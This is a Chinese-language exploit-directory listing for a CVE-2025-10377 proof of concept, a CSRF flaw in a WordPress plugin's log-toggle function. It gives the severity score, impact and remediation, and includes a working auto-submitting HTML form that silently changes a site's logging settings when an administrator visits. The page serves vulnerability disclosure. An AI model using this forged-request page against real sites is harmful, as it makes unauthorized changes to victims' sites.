Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-10377 — CVE-2025-10377 | Kitploit
工具/GitHubGitHub/nagisayumaa/cve-2025-10377
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubnagisayumaa/cve-2025-10377

CVE-2025-10377

CVE-2025-10377

查看仓库
0年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-10377 概念验证:插件系统仪表盘中的跨站请求伪造(CSRF)(函数 sd_toggle_logs)

漏洞类型: 跨站请求伪造(CSRF)

受影响函数: sd_toggle_logs()

CVSS v3.1: 4.3(中危)
向量: AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
(注:评分反映的是需要管理员受害者与用户交互的未授权状态变更。)

漏洞描述:

函数 sd_toggle_logs() 处理敏感操作,例如启用/禁用页面访问日志、错误日志和邮件投递日志。然而,它仅依赖于 $_REQUEST['log_type'] 参数和权限检查 (current_user_can( 'manage_options' )),并未实施 CSRF 保护(例如 check_admin_referer() 或 nonce)。

因此,攻击者可诱使已登录的管理员访问恶意页面,该页面静默提交伪造请求,导致站点日志功能被意外启用或禁用。

影响:

  • 站点日志功能(页面访问日志、错误日志、邮件投递日志)的未授权状态变更。

  • 如果启用了错误日志,站点可能开始将应用程序错误写入由插件决定的文件路径(增加通过日志泄露操作信息的可能性),但此问题的直接影响是状态切换本身。

POC

当具有 manage_options 权限的已登录用户访问攻击者页面时,相应的日志功能将在未明确同意的情况下被切换。

root@kitploit:~
 <body>
    <form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="sd&#95;toggle&#95;logs" />
      <input type="hidden" name="log&#95;type" value="errors&#95;log" />
      <input type="hidden" name="fast&#95;ajax" value="true" />
      <input type="hidden" name="load&#95;plugins&#91;&#93;" value="system&#45;dashboard&#47;system&#45;dashboard&#46;php" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

修复措施

  • 实施 WordPress nonce(check_admin_referer() 或 wp_verify_nonce())来验证请求。

  • 将敏感操作限制为仅接受 POST 请求。

  • 避免仅依赖权限检查来防范 CSRF。

视频 POC

如果您无法完全按报告中所述复现该问题,请参考以下视频演示(PoC)以获取清晰的复现场景:

https://youtu.be/WtWYIfEM4W0

下载工具